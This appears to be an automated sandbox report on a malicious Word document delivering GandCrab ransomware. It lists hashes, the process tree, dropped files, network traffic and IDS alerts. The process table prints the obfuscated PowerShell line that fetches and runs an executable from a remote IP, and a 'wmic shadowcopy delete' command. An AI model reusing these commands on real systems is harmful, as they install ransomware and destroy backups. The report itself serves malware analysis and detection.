File name: | 6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.gz |
Full analysis: | https://app.any.run/tasks/c520954d-6133-46ea-ac52-e445712bce4e |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | January 23, 2019, 10:29:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/gzip |
File info: | gzip compressed data, max compression, from Unix |
MD5: | 6EC3DF812B92C85421BFA9049C4D8E10 |
SHA1: | B36E9573D95E918427B24E3D29EA7D9FD389D5A2 |
SHA256: | A9D5BBBB5362438DF5944D02FE54DDEDC823A28E6D2B97F30D11D09F9B8DA08D |
SSDEEP: | 384:hm6mXfJ3sTNCvsVhN9QCgIcQYgCpV1Uok3o3wofYKanob1qL:hm6mXhc58YhNi3zLf1muwofYKWWM |
.z/gz/gzip | | | GZipped data (100) |
---|
OperatingSystem: | Unix |
---|---|
ExtraFlags: | Maximum Compression |
ModifyDate: | 0000:00:00 00:00:00 |
Flags: | (none) |
Compression: | Deflated |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3092 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.gz.z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3332 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3088 | powershell $AbR41ULTo = '65532.804050533$xJw0xyfhi = 65532.804050533n65532.804050533e65532.804050533w65532.804050533-obj65532.804050533e65532.804050533c65532.804050533t n65532.804050533e65532.804050533t65532.804050533.w65532.804050533e65532.804050533b65532.804050533cli65532.804050533ent; $xJw0xyfhi.d65532.804050533o65532.804050533w65532.804050533n65532.804050533l65532.804050533o65532.804050533a65532.804050533d65532.804050533f65532.804050533i65532.804050533le(\"65532.804050533h65532.804050533t65532.804050533t65532.804050533p65532.804050533://205.185.117.187/olalala/putty.exe\", \"c:\win65532.804050533dows\t65532.804050533emp\put65532.804050533t65532.804050533y65532.804050533.65532.804050533e65532.804050533x65532.804050533e\"); 65532.804050533s65532.804050533tar65532.804050533t-p65532.804050533r65532.804050533o65532.804050533ces65532.804050533s \"c:\win65532.804050533d65532.804050533o65532.804050533ws\temp\p65532.804050533u65532.804050533t65532.804050533t65532.804050533y.ex65532.804050533e\";'.replace('65532.804050533', $OPQJjrhbU);$uDzjkYGah = '';iex($AbR41ULTo); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2372 | "C:\windows\temp\putty.exe" | C:\windows\temp\putty.exe | powershell.exe | |
User: admin Company: Nullsoft, Inc. Integrity Level: MEDIUM Description: Audience Need Zimmerman Version: 3.1.22.6 | ||||
2464 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | putty.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3352 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3092 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3092.42394\6d20fce7ff12863ee648eff76a6e77e67bd78fb93fd137456ceb134de4b30be1.bin.gz | — | |
MD5:— | SHA256:— | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD7E2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\310IGADT6HWAIXO3EWHF.temp | — | |
MD5:— | SHA256:— | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:FBEC01291D1C04217F7CAA3AC21438DB | SHA256:64F8E252FD26F0804E4B3FBAFD786885EB244D9FE58608564DE150996F2D929A | |||
2372 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:458562144231242DCBDED353C6FFD049 | SHA256:829B5C093E15BD489F560A69CFF4967968F9E5B001C2256ED53DB3337AEABF28 | |||
2372 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim | — | |
MD5:— | SHA256:— | |||
2372 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.xiyshsyga | — | |
MD5:— | SHA256:— | |||
2372 | putty.exe | C:\Recovery\XIYSHSYGA-DECRYPT.txt | text | |
MD5:69B954BBAC21AB9C44ECD88D67010614 | SHA256:651D85BE695C4825A4C42F1848B689F8ECABEF2202BC4142110AD2F89A3E9A76 | |||
2372 | putty.exe | C:\MSOCache\XIYSHSYGA-DECRYPT.txt | text | |
MD5:69B954BBAC21AB9C44ECD88D67010614 | SHA256:651D85BE695C4825A4C42F1848B689F8ECABEF2202BC4142110AD2F89A3E9A76 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3088 | powershell.exe | GET | 200 | 205.185.117.187:80 | http://205.185.117.187/olalala/putty.exe | US | executable | 641 Kb | suspicious |
2372 | putty.exe | GET | 301 | 138.201.162.99:80 | http://www.kakaocorp.link/ | DE | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2372 | putty.exe | 138.201.162.99:80 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
3088 | powershell.exe | 205.185.117.187:80 | — | FranTech Solutions | US | suspicious |
2372 | putty.exe | 138.201.162.99:443 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3088 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3088 | powershell.exe | Potentially Bad Traffic | ET INFO Possibly Suspicious Request for Putty.exe from Non-Standard Download Location |
3088 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3088 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3088 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |